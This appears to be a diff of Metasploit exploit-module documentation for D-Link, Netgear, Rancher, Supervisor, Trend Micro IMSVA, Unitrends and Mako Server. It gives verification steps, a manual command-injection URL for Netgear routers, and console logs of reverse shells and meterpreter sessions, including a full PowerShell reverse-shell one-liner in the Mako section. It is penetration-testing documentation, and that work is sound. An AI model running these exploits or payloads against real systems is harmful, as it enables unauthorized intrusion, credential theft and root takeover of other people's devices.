3. Do : `set RHOST [RouterIP]`
4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp`
5. Do : `run`
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
## Example
```
msf > use exploit/linux/http/dlink_dir850l_unauth_exec
msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_dir850l_unauth_exec) > check
[*] 192.168.0.14:80 The target service is running, but could not be validated.
msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true
VERBOSE => true
msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131
LPORT => 3131
msf exploit(dlink_dir850l_unauth_exec) > run
[*] Started reverse TCP handler on 192.168.0.11:3131
[*] 192.168.0.14:80 - Connecting to target...
[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535
[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt
[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm
[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm
[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
[*] 192.168.0.14:80 - Sending payload to the server...
[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm
[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm
[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us...
[*] Sending stage (84 bytes) to 192.168.0.14
[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400
[+] Deleted /tmp/uoskutcy
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1
[*] Starting interaction with 1...
190745749
wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj
true
pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP
OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH
iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY
pwd
/
```

View File

@ -0,0 +1,51 @@
The module netgear_dgn1000_setup_unauth_exec exploits an unauthenticated OS command injection vulnerability in vulnerable Netgear DGN1000 with firmware versions up to `1.1.00.48` in addition to DGN2000v1 models, all firmware versions. The vulnerability occurs in within the `syscmd` fuction of the `setup.cgi` script to execute arbitrary commands. Manual exploitation could be completed through the browser, as for example : `http://<RouterIP>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=echo+vulnerable&curpath=/&currentsetting.htm=1`. Such example will return "vulnerable" on the page. Vulnerable models have `wget` installed on `/usr/bin/wget` and can be leveraged to drop a MIPS Big Endian payload.
## Vulnerable Application
Netgear DGN1000 with firmware versions up to `1.1.00.48` and DGN2000v1 models
## Verification Steps
1. Start msfconsole
2. Do : `use exploit/linux/http/netgear_dgn1000_setup_unauth_exec`
3. Do : `set RHOST [RouterIP]`
4. Do : `set PAYLOAD [payload]`
5. Do : `run`
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
## Scenarious
Sample output of a successfull exploitation should be look like this :
```
msf > use exploit/linux/http/netgear_dgn1000_setup_unauth_exec
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RHOST 192.168.0.1
RHOST => 192.168.0.1
msf exploit(netgear_dgn1000_setup_unauth_exec) > set RPORT 80
RPORT => 80
msf exploit(netgear_dgn1000_setup_unauth_exec) > set LHOST eth0
LHOST = eth0
msf exploit(netgear_dgn1000_setup_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(netgear_dgn1000_setup_unauth_exec) > run
[*] Started reverse TCP handler on 192.168.0.11:4444
[*] 192.168.0.1:80 - Connecting to target...
[*] 192.168.0.1:80 - Exploiting target ....
[*] Using URL: http://0.0.0.0:8080/DnuJhOHYg7auIz
[*] Local IP: http://192.168.0.11:8080/DnuJhOHYg7auIz
[*] Client 192.168.0.1 (Wget) requested /DnuJhOHYg7auIz
[*] Sending payload to 192.168.0.1 (Wget)
[*] Sending stage (1073332 bytes) to 192.168.0.1
[*] Meterpreter session 2 opened (192.168.0.11:4444 -> 192.168.0.1:51558) at 2017-10-20 20:37:06 -0400
[*] Command Stager progress - 100.00% done (129/129 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.0.1
OS : (Linux 2.6.20-Amazon_SE)
Architecture : mips
Meterpreter : mipsbe/linux
meterpreter >
```

View File

@ -0,0 +1,169 @@
# Vulnerable Application
Utilizing Rancher Server, an attacker can create a docker container
with the '/' path mounted with read/write permissions on the host
server that is running the docker container. As the docker container
executes command as uid 0 it is honored by the host operating system
allowing the attacker to edit/create files owned by root. This exploit
abuses this to creates a cron job in the '/etc/cron.d/' path of the
host server.
The Docker image should exist on the target system or be a valid image
from hub.docker.com.
Use `check` with verbose mode to get a list of exploitable Rancher
Hosts managed by the target system.
## Rancher setup
Rancher is deployed as a set of Docker containers. Running Rancher is
as simple as launching two containers. One container as the management
server and another container on a node as an agent.
This module was tested with Debian 9 and CentOS 7 as the host operating
system with Docker 17.06.1-ce and Rancher Server 1.6.2, all with
default installation.
### Install Debian 9
First [install Debian 9][1] with default task selection. This includes
the "*standard system utilities*".
### Install Docker CE
Then install a supported version of [Docker on Debian system][2].
```bash
# TL;DR
apt-get remove docker docker-engine
apt-get install apt-transport-https ca-certificates curl gnupg2 software-properties-common
curl -fsSL https://download.docker.com/linux/debian/gpg | apt-key add -
apt-key fingerprint 0EBFCD88
# Verify that the key ID is 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88.
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/debian $(lsb_release -cs) stable"
apt-get update
apt-get install docker-ce
docker run hello-world
```
### Rancher Server (Management)
I recommend doing a ['Rancher Server - Single Container (NON-HA)'
installation][3].
If Docker is installed, the command to start a single instance of
Rancher is simple.
```bash
# TL;DR
sudo docker run -d --restart=unless-stopped -p 8080:8080 rancher/server
```
If all is passing navigate to `http://[ip]:8080/`. You should see the
Rancher Server UI web application.
### Rancher Host (Agent)
Add a [new host][4] to Rancher Server so that the Docker host can be managed.
**Set Host Registration URL**
The first time that you add a host, you may be required to set up the
Host Registration URL.
* Navigate to Admin / Settings (`http://[ip]:8080/admin/settings`)
* Check if `"http://[ip]:8080/"` is set
* Click on Save.
**Add new host**
* Navigate to Infrastructure / Hosts (`http://[ip]:8080/env/1a5/infra/hosts`)
* Click on Add Host
* Copy the command from Point 5 (and remove sudo prefix)
`docker run --rm --privileged -v /var/run/docker.sock:/var/run/docker.sock -v /var/lib/rancher:/var/lib/rancher rancher/agent:v1.2.2 http://[ip]:8080/v1/scripts/XXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXX`
* Paste and run the command on the host
The new host should pop up on the Hosts screen within a minute.
# Exploitation
This module is designed to gain root access on a Rancher Host.
## Options
- CONTAINER_ID if you want to have a human readable name for your container, otherwise it will be randomly generated.
- DOCKERIMAGE is the local image or hub.docker.com available image you want to have Rancher to deploy for this exploit.
- TARGETENV this is the target Rancher Environment. The default environment is `1a5`.
- TARGETHOST is the target Rancher Host. The default host is `1h1`.
By default access control is disabled, but if enabled, you need API
Keys with at least "restrictive" permission in the environment.
See Rancher docs for [api-keys][5] and [membership-roles][6].
- HttpUsername is for your Access Key
- HttpPassword is for your Secret Key
Advanced Options
- TARGETURI this is the Rancher API base path. The default environment is `/v1/projects`.
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
## Steps to exploit with module
- [ ] Start msfconsole
- [ ] use exploit/linux/http/rancher_server
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server
## Example Output
```
msf > use exploit/linux/http/rancher_server
msf exploit(rancher_server) > set RHOST 192.168.91.111
RHOST => 192.168.91.111
msf exploit(rancher_server) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf exploit(rancher_server) > set LHOST 192.168.91.1
LHOST => 192.168.91.1
msf exploit(rancher_server) > set VERBOSE true
VERBOSE => true
msf exploit(rancher_server) > check
[+] Rancher Host "rancher" (TARGETHOST 1h1) on Environment "Default" (TARGETENV 1a5) found <-- targeted
[*] 192.168.91.111:8080 The target is vulnerable.
msf exploit(rancher_server) > exploit
[*] Started reverse TCP handler on 192.168.91.1:4444
[*] Setting container json request variables
[*] Creating the docker container command
[+] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[+] The docker container has stopped, now trying to remove it
[+] The docker container has been removed.
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (40747 bytes) to 192.168.91.111
[*] Meterpreter session 1 opened (192.168.91.1:4444 -> 192.168.91.111:49948) at 2017-07-27 22:18:00 +0200
[+] Deleted /etc/cron.d/wlHVKGMA
[+] Deleted /tmp/jxKUxUyN
meterpreter > sysinfo
Computer : rancher
OS : Debian 9.1 (Linux 4.9.0-3-amd64)
Architecture : x64
Meterpreter : x64/linux
meterpreter >
```
## Exploit Detection
Rancher Server has an [audit log][7]. While running this module two
events (create and delete) were logged. Even though the container is
deleted, its still able to be viewed from the link in the audit log.
## Mitigation
* Do not deploy a Rancher Host on the same host where the Rancher
Server is. Your entire rancher infrastructure is in [danger][8].
* Only allow trusted users to have more permissions than read-only.
Docker protection such as Username Namespaces could not be applied
because Rancher Agents run as a privileged container.
[1]:https://www.debian.org/releases/stretch/amd64/index.html.en
[2]:https://docs.docker.com/engine/installation/linux/docker-ce/debian/
[3]:https://rancher.com/docs/rancher/v1.6/en/installing-rancher/installing-server/#launching-rancher-server---single-container-non-ha
[4]:https://rancher.com/docs/rancher/v1.6/en/hosts/#adding-a-host
[5]:https://rancher.com/docs/rancher/v1.6/en/api/v2-beta/api-keys/
[6]:https://rancher.com/docs/rancher/v1.6/en/environments/#membership-roles
[7]:https://rancher.com/docs/rancher/v1.6/en/rancher-services/audit-log/
[8]:https://rancher.com/docs/rancher/v1.6/en/faqs/troubleshooting/#help-i-turned-on-access-controldocsrancherv16enconfigurationaccess-control-and-can-no-longer-access-rancher-how-do-i-reset-rancher-to-disable-access-control
[9]:https://rancher.com/docs/rancher/v1.6/en/installing-rancher/selinux/

View File

@ -0,0 +1,78 @@
## Vulnerable Application
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
This has been tested with versions 3.2.0 and 3.3.2
### Creating A Testing Environment
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
1. ```sudo apt-get install supervisor```
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
```
[inet_http_server] ; inet (TCP) server disabled by default
port=:9001 ; ip_address:port specifier, *:port for all iface
username=user ; default is no username (open server)
password=123 ; default is no password (open server)
```
3. Restart the service: `sudo service supervisor restart`
## Verification Steps
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```set httpusername user```
5. ```set httppassword 123```
6. ```exploit```
7. A meterpreter session should have been opened successfully
## Options
**HttpUsername**
Username for HTTP basic auth which is set in the conf file(optional)
**HttpPassword**
Password for HTTP basic auth which is set in the conf file(optional)
**TARGETURI**
The path to the XML-RPC endpoint
## Scenarios
### Supervisor 3.2.0 on Xubuntu 16.04
```
msf > use exploit/linux/http/supervisor_xmlrpc_exec
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check
[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
meterpreter >
```

View File

@ -0,0 +1,61 @@
## Vulnerable Application
This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user.
The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.
**Vulnerable Application Installation Steps**
IMSVA is distrubed as an ISO image by Trend Micro.
Following steps are valid on the CentOS 6 x64 bit operating system.
1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
4. Click to the download button and complete installation of ISO.
If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
**System requirements:**
- Virtualbox or VMware can be used.
- 4 GB of memory at least.
- 120 GB of disk size at least.
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/trendmicro_imsva_widget_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `Awesome. JSESSIONID value` in console.
- [ ] **Verify** that you are getting `Session with widget framework successfully initiated` session.
## Scenarios
```
msf > use exploit/linux/http/trendmicro_imsva_widget_exec
msf exploit(trendmicro_imsva_widget_exec) > set RHOST 12.0.0.201
RHOST => 12.0.0.184
msf exploit(trendmicro_imsva_widget_exec) > check
[*] 12.0.0.184:443 The target appears to be vulnerable.
msf exploit(trendmicro_imsva_widget_exec) > exploit
[*] Started reverse TCP handler on 12.0.0.1:4444
[*] Extracting JSESSIONID from publicly accessible log file
[+] Awesome. JSESSIONID value = 0567E974AE729E58178C9B513FEBE41E
[*] Initiating session with widget framework
[+] Session with widget framework successfully initiated.
[*] Trigerring command injection vulnerability
[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.201:44103) at 2017-10-08 18:05:11 +0300
pwd
/opt/trend/imss/UI/adminUI/ROOT/widget
```

View File

@ -0,0 +1,42 @@
## Vulnerable Application
Unitrends UEB 9 http api/storage remote root
This exploit leverages a sqli vulnerability for authentication bypass,
together with command injection for subsequent root RCE.
## Verification Steps
1. ```use exploit/linux/http/ueb9_api_storage ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/http/ueb9_api_storage
msf exploit(ueb9_api_storage) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_api_storage) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_api_storage) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:443 - pwn'ng ueb 9....
[*] Command Stager progress - 19.83% done (164/827 bytes)
[*] Command Stager progress - 39.30% done (325/827 bytes)
[*] Command Stager progress - 57.44% done (475/827 bytes)
[*] Command Stager progress - 75.45% done (624/827 bytes)
[*] Command Stager progress - 93.35% done (772/827 bytes)
[*] Command Stager progress - 110.88% done (917/827 bytes)
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Command Stager progress - 126.72% done (1048/827 bytes)
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33674) at 2017-10-06 11:07:47 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

View File

@ -0,0 +1,72 @@
## Vulnerable Application
Unitrends UEB 9 bpserverd authentication bypass RCE
This exploit uses roughly the same process to gain root execution
as does the apache user on the Unitrends appliance. The process is
something like this:
1. Connect to xinetd process (it's usually running on port 1743)
2. This process will send something like: `?A,Connect36092`
3. Initiate a second connection to the port specified
in the packet from xinetd (36092 in this example)
4. send a specially crafted packet to xinetd, containing the
command to be executed as root
5. Receive command output from the connection to port 36092
6. Close both connections
## Verification Steps
1. ```use exploit/linux/misc/ueb9_bpserverd ```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```exploit```
5. A meterpreter session should have been opened successfully
## Scenarios
### UEB 9.1 on CentOS 6.5
```
msf > use exploit/linux/misc/ueb9_bpserverd
msf exploit(ueb9_bpserverd) > set rhost 10.0.0.230
rhost => 10.0.0.230
msf exploit(ueb9_bpserverd) > set lhost 10.0.0.141
lhost => 10.0.0.141
msf exploit(ueb9_bpserverd) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 10.0.0.230:1743 - 10.0.0.230:1743 - pwn'ng ueb 9....
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 45425
[*] 10.0.0.230:1743 - Connecting to 45425
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 26.71% done (199/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40889
[*] 10.0.0.230:1743 - Connecting to 40889
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 53.56% done (399/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 40016
[*] 10.0.0.230:1743 - Connecting to 40016
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] 10.0.0.230:1743 - Command Stager progress - 80.27% done (598/745 bytes)
[*] 10.0.0.230:1743 - Connecting to xinetd for bpd port...
[+] 10.0.0.230:1743 - bpd port recieved: 53649
[*] 10.0.0.230:1743 - Connecting to 53649
[+] 10.0.0.230:1743 - Connected!
[*] 10.0.0.230:1743 - Sending command buffer to xinetd
[*] Sending stage (826872 bytes) to 10.0.0.230
[*] Meterpreter session 1 opened (10.0.0.141:4444 -> 10.0.0.230:33715) at 2017-10-06 11:33:56 -0400
[*] 10.0.0.230:1743 - Command Stager progress - 100.00% done (745/745 bytes)
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter >
```

View File

@ -21,6 +21,7 @@ Compatible Payloads
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/mainframe/apf_privesc_jcl normal JCL to escalate privilages via APF LIB
cmd/mainframe/bind_shell_jcl normal Z/OS (MVS) Command Shell, Bind TCP
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
```

View File

@ -0,0 +1,251 @@
## Description
This module exploits a vulnerability found in Mako Server v2.5, 2.6.
It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
## Vulnerable Application
[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
- v2.5
- v2.6
Links:
- [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
- [Windows download page](https://makoserver.net/download/windows)
- [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
- [Linux download page](https://makoserver.net/download/linux-x86)
- [Documentation](https://makoserver.net/download/manual)
## References for vulnerability
- https://blogs.securiteam.com/index.php/archives/3391
- https://www.exploit-db.com/exploits/42683
## Verification Steps for Windows
1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
4. Start msfconsole on host
5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
6. Do: ```set RHOST <IP address of target system>```
7. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
8. Do: ```set LHOST <IP address of host system>```
9. Do: ```exploit```
10. You should get a Windows command shell
## Verification Steps for Linux
1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
2. From inside the extracted folder, do ```./rundemo.sh```
4. Start msfconsole on host
5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
6. Do: ```set RHOST <IP address of target system>```
7. Do: ```set PAYLOAD cmd/unix/python_reverse```
8. Do: ```set LHOST <IP address of host system>```
9. Do: ```exploit```
10. You should get a Linux command shell (may need to wait ~30 seconds)
## Example Output
```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.10.10.2:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400
Microsoft Windows
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Smith\Downloads\MakoServer>
```
## Example Verbose Output
```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true
VERBOSE => true
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2
LHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > check
[*] Trying to detect running Mako Server and necessary files...
[*] Mako Server save.lsp returns correct ouput.
[*] 10.10.10.3:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.10.10.2:4444
[*] Sending payload to target...
[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]])
[*] Sending PUT request to save.lsp...
[*] Sending GET request to manage.lsp...
[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49174) at 2017-10-26 21:21:08 -0400
Microsoft Windows
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Smith\Downloads\MakoServer>
```
## Scenarios
### Targeting Windows 7 SP1 x64 running Mako Server v2.5
A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
PAYLOAD => cmd/windows/reverse_powershell
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.10.10.4:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:49189) at 2017-10-25 20:57:56 -0400
Microsoft Windows
Copyright (c) Microsoft Corporation. All rights reserved.
C:\Users\Smith\Downloads\MakoServer>^Z
Background session 1? [y/N] y
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set LPORT 8080
LPORT => 8080
msf post(shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.4:8080
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
...
[*] Command stager progress: 100.00% (102108/102108 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/windows 10.10.10.4:4444 -> 10.10.10.2:49189 (10.10.10.2)
2 meterpreter x86/windows smith-PC\smith @ SMITH-PC 10.10.10.4:8080 -> 10.10.10.2:49190 (10.10.10.2)
msf post(shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: smith-PC\smith
meterpreter > sysinfo
Computer : SMITH-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
```
### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:
```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.10.10.4:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500
ls
LICENSE.txt
mako
mako.zip
README.txt
rundemo.sh
tutorial
^Z
Background session 1? [y/N] y
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set LPORT 8080
LPORT => 8080
msf post(shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.4:8080
[*] Sending stage (847604 bytes) to 10.10.10.2
[*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
[*] Command stager progress: 100.00% (736/736 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
